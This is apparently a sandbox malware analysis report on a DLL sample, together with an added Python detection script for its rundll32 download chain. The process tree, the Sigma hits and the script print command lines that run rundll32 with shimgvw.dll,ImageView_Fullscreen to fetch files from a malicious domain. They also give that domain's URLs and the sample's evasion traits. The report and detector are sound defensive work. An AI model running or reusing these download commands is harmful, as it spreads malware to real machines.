Windows Analysis Report
QEydjQdRxs.dll

Overview

General Information

Sample name: QEydjQdRxs.dll (renamed because the original name is a hash value)
Original sample name: b62c9168fcde444dbc3be1593e80747929dcf1a49cc6305b49456d68d0c49e71.dll
Analysis ID: 1500943
MD5: 71481f31ac558750937ef27dad2d0025
SHA1: fa2010a283a723a0d2a68d6bc8b16389b36a3a04
SHA256: b62c9168fcde444dbc3be1593e80747929dcf1a49cc6305b49456d68d0c49e71
Tags: dll, rammenale-com

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: rundll32 run dll from internet
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1532 cmdline: loaddll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4592 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7104 cmdline: rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 1992 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 2148 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 940 cmdline: rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 5260 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 1732 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5440 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5428 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches

Sigma Overview

Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) | Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7104, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 1992, ProcessName: rundll32.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7104, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 1992, ProcessName: rundll32.exe
Source: Process started | Author: Joe Security | Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7104, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 1992, ProcessName: rundll32.exe
No Suricata rule has matched
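The Sigma hits and the process tree above describe a single chain: the submitted DLL, loaded through rundll32.exe (export #1 or mydllmain), starts further rundll32.exe instances that load the Windows Photo Viewer library shimgvw.dll through its ImageView_Fullscreen export with an https URL in the position where a local image path is expected. Those child processes are the rundll32 instances that connect to rammenale.com in the Networking section below. The Python script that follows is an added example, not part of the Joe Sandbox report or of any Sigma rule; it parses process-creation records written in the same flattened "Key: value, Key: value" layout as the Sigma data above and applies two checks derived from this tree: (1) rundll32 loading shimgvw.dll,ImageView_Fullscreen with an http(s) argument, and (2) rundll32 spawned by rundll32 where the parent loaded its DLL from outside the Windows and Program Files directories. The first record is copied from the Sigma hit above; the other three records, the check names, the PROTECTED_DIRS list and all sample paths are constructed for this example.

```python
"""Checks for the rundll32 -> shimgvw.dll download chain over process-creation records.
Added example, not part of the Joe Sandbox report or its Sigma rules. Records use the
flattened "Key: value, Key: value" layout of the report's Sigma hits. REPORT_RECORD is
copied from the report; the other three records are constructed for this example."""
import re

# Field names seen in the report's Sigma records. Values contain ": " (drive letters)
# and "," (DLL,Export), so records are split on ", <known key>: ", longest key first.
KNOWN_KEYS = (
    "Command", "CommandLine", "CommandLine|base64offset|contains", "Image", "NewProcessName",
    "OriginalFileName", "ParentCommandLine", "ParentImage", "ParentProcessId",
    "ParentProcessName", "ProcessCommandLine", "ProcessId", "ProcessName",
)
_KEY_RE = re.compile(
    r"(?:^|, )(" + "|".join(re.escape(k) for k in sorted(KNOWN_KEYS, key=len, reverse=True)) + r"): "
)
# rundll32 <dir>\shimgvw.dll,ImageView_Fullscreen (the Windows Photo Viewer entry point)
SHIMGVW_VIEW_RE = re.compile(
    r"rundll32(?:\.exe)?\s+\"?[^\"\s]*shimgvw\.dll\"?\s*,\s*ImageView_Fullscreen\b", re.IGNORECASE)
RUNDLL_DLL_RE = re.compile(r"rundll32(?:\.exe)?\s+\"?([^\"\s,]+\.dll)", re.IGNORECASE)  # first DLL arg
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Directories a standard user cannot write to (assumption made for this example).
PROTECTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_record(record: str) -> dict:
    """Split one flattened record into {field: value}; empty values stay ''."""
    hits = list(_KEY_RE.finditer(record))
    fields = {}
    for i, hit in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(record)
        fields[hit.group(1)] = record[hit.end():end].strip()
    return fields

def extract_urls(record: str) -> list:
    """URLs passed on the command line: the network IOCs to pivot on."""
    cmd = parse_record(record).get("CommandLine", "")
    return [u.rstrip(",.;)") for u in URL_RE.findall(cmd)]

def is_remote_image_view(cmdline: str) -> bool:
    """Check 1: Photo Viewer told to open an http(s) URL instead of a local image file."""
    return bool(SHIMGVW_VIEW_RE.search(cmdline)) and bool(URL_RE.search(cmdline))

def rundll32_dll_path(cmdline: str):
    """DLL path rundll32 was asked to load, or None if the command is not rundll32."""
    m = RUNDLL_DLL_RE.search(cmdline)
    return m.group(1) if m else None

def is_user_writable(path: str) -> bool:
    """Fully qualified path outside PROTECTED_DIRS. Bare names (no backslash) go through
    the normal DLL search order and are deliberately not flagged here."""
    p = path.lower()
    return "\\" in p and not p.startswith(PROTECTED_DIRS)

def is_rundll32_chain_from_user_dll(fields: dict) -> bool:
    """Check 2: rundll32 spawned by a rundll32 that loaded a DLL from a user-writable path."""
    parent, child = fields.get("ParentImage", "").lower(), fields.get("Image", "").lower()
    if not (parent.endswith("\\rundll32.exe") and child.endswith("\\rundll32.exe")):
        return False
    dll = rundll32_dll_path(fields.get("ParentCommandLine", ""))
    return dll is not None and is_user_writable(dll)

def evaluate(record: str) -> list:
    """Names (this example's own) of the checks that fire; an empty list means clean."""
    fields = parse_record(record)
    fired = []
    if is_remote_image_view(fields.get("CommandLine", "")):
        fired.append("remote_image_view")
    if is_rundll32_chain_from_user_dll(fields):
        fired.append("rundll32_chain_user_dll")
    return fired


# Copied from the report's Sigma hit (PID 1992, parent PID 7104).
REPORT_RECORD = (
    r"Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, "
    r"CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, "
    r"CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, "
    r"NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, "
    r'ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, '
    r"ParentProcessId: 7104, ParentProcessName: rundll32.exe, "
    r"ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, "
    r"ProcessId: 1992, ProcessName: rundll32.exe"
)
# Constructed: Photo Viewer opening a local picture from Explorer; must not fire.
BENIGN_LOCAL_IMAGE = (
    r"CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen C:\Users\user\Pictures\holiday.jpg, "
    r"Image: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, "
    r"ParentImage: C:\Windows\explorer.exe, ProcessId: 4100"
)
# Constructed after the second chain in the process tree (mydllmain export, regit.tmp); fires both checks.
CONSTRUCTED_CHAIN = (
    r"CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp, "
    r"Image: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain, "
    r"ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 940, ProcessId: 1732"
)
# Constructed: rundll32 under rundll32, but the parent's DLL lives in System32; must not fire.
BENIGN_SYSTEM_CHAIN = (
    r"CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen C:\Users\user\Pictures\scan.png, "
    r"Image: C:\Windows\System32\rundll32.exe, ParentCommandLine: rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Users\user\Pictures\scan.png, "
    r"ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3300, ProcessId: 3312"
)

if __name__ == "__main__":
    for rec in (REPORT_RECORD, BENIGN_LOCAL_IMAGE, CONSTRUCTED_CHAIN, BENIGN_SYSTEM_CHAIN):
        print(evaluate(rec), extract_urls(rec))
```

Check 1 is the narrow indicator for this sample's download stage and does not depend on the parent process at all; check 2 is the broader lineage rule and would also catch a renamed copy of the DLL as long as it is loaded from a user-writable directory. Neither check consults file hashes, so a recompiled variant with the same behaviour still fires; a DLL given to rundll32 by bare name (resolved through the DLL search order) is deliberately left to other rules.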

AV Detection

Source: https://rammenale.com/for2/aclog.txt | Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp | Avira URL Cloud: Label: malware
Avira URL Cloud returned the same label for 83 further strings that are these two URLs either cut short (https://rammenale.com/for2/aclog, https://rammenale.com/for2/aclogtxt) or followed by a few bytes of adjacent memory (for example https://rammenale.com/for2/aclog.txt6634-1003, https://rammenale.com/for2/regit.tmpxe.mui, https://rammenale.com/for2/aclog.txtentindowsINetCookies, https://rammenale.com/for2/regit.tmpC:). They add no indicator beyond the two URLs above.
Source: QEydjQdRxs.dll | Virustotal: Detection: 8%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.9% probability
Source: QEydjQdRxs.dll | Joe Sandbox ML: detected
Source: QEydjQdRxs.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: QEydjQdRxs.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6B921B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 0_2_6B921B85
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6B9338F4 FindFirstFileExW, 0_2_6B9338F4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9E1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 3_2_6F9E1B85
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6F9F38F4 FindFirstFileExW, 3_2_6F9F38F4

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 131.153.206.231 443
Source: Joe Sandbox View | ASN Name: SS-ASHUS SS-ASHUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: six requests for /for2/aclog.txt and six for /for2/regit.tmp, interleaved, all with identical headers:
  GET /for2/aclog.txt HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: rammenale.com
  Connection: Keep-Alive

  GET /for2/regit.tmp HTTP/1.1
  (same headers as above)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: rammenale.com
Source: global traffic | HTTP traffic detected: six responses, four dated 04:53:02 GMT and two dated 04:53:04 GMT, otherwise identical:
  HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 1251
  date: Thu, 29 Aug 2024 04:53:02 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Every request for /for2/aclog.txt and /for2/regit.tmp was answered with 404 during this run, so no second-stage content reached the sandbox. What those two files would do when the server serves them is not covered by this report; the score rests on the download chain, the AV labels and the static indicators, not on observed payload behaviour.
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comm
Source: rundll32.exe, 00000005.00000002.3289519547.0000000008F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3289414111.0000000007B46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289577323.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008CA1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rammenale.com/
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rammenale.com//9
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rammenale.com/6
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rammenale.com/T
Source: rundll32.exe, 00000006.00000002.3289715229.0000000008CBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rammenale.com/d
Source: rundll32.exe, 0000000B.00000002.3288849622.0000000005132000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3288849622.000000000511A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rammenale.com/for2/aclog
Source: rundll32.exe, 0000000B.00000002.3286397413.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008D02000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3289283250.0000000008C8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rammenale.com/for2/aclog.txt
The remaining 47 string hits, all in heap dumps of the rundll32.exe analysis processes 5, 6, 0xB and 0xC, are https://rammenale.com/for2/aclog.txt followed by one to twenty bytes of adjacent memory (for example https://rammenale.com/for2/aclog.txt6634-1003, https://rammenale.com/for2/aclog.txtentindowsINetCookies, https://rammenale.com/for2/aclog.txtentdll, https://rammenale.com/for2/aclog.txtC:). They are the same URL string and point to the same indicator.
Source: rundll32.exe, 0000000B.00000002.3289283250.0000000008CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogY
Source: rundll32.exe, 00000005.00000002.3286153316.0000000003037000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3286159157.0000000002B77000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3286150447.0000000002B37000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclogtxt
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp
Source: rundll32.exe, 00000008.00000002.3289370327.0000000008BE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp$u
Source: rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp%
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp(
Source: rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp)
Source: rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286449420.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp0
Source: rundll32.exe, 0000000C.00000002.3286396113.0000000002AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp08
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4
Source: rundll32.exe, 0000000C.00000002.3289874951.000000000889F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4X
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4Zfrh
Source: rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4kJ
Source: rundll32.exe, 00000008.00000003.2337362841.0000000008C11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337408753.0000000008C19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289712371.0000000008C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp4s5
Source: rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp6
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3289370327.0000000008BE3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp6634-1003
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp7
Source: rundll32.exe, 00000007.00000002.3286915382.00000000028CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp8a5
Source: rundll32.exe, 00000007.00000002.3286915382.000000000284A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmp;
Source: rundll32.exe, 0000000C.00000002.3289874951.000000000882B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpA
Source: rundll32.exe, 00000003.00000002.2054157114.0000000002880000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2053873266.0000000000390000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3286915382.0000000002840000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3286404061.00000000026D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286340448.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286449420.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286291304.0000000002990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpC:
Source: rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpG
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpP
Source: rundll32.exe, 00000007.00000002.3286295606.00000000026C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpPR5
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpS
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007B5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpc4u
Source: rundll32.exe, 00000007.00000002.3286915382.00000000028B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpent
Source: rundll32.exe, 00000007.00000002.3286915382.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpft
Source: rundll32.exe, 0000000C.00000002.3286396113.0000000002B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpg
Source: rundll32.exe, 00000007.00000002.3289414111.0000000007B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmph
Source: rundll32.exe, 00000008.00000002.3289919472.0000000008C47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337289222.0000000008C46000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3289874951.0000000008844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpmp
Source: rundll32.exe, 00000008.00000002.3289370327.0000000008BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpn
Source: rundll32.exe, 0000000C.00000002.3289874951.0000000008814000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpry
Source: rundll32.exe, 00000008.00000002.3288087591.0000000003110000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3288019449.0000000002D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmps
Source: loaddll32.exe, 00000000.00000002.2078622698.0000000000B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpsC:
Source: rundll32.exe, 00000008.00000002.3286593843.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2337436312.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/regit.tmpu
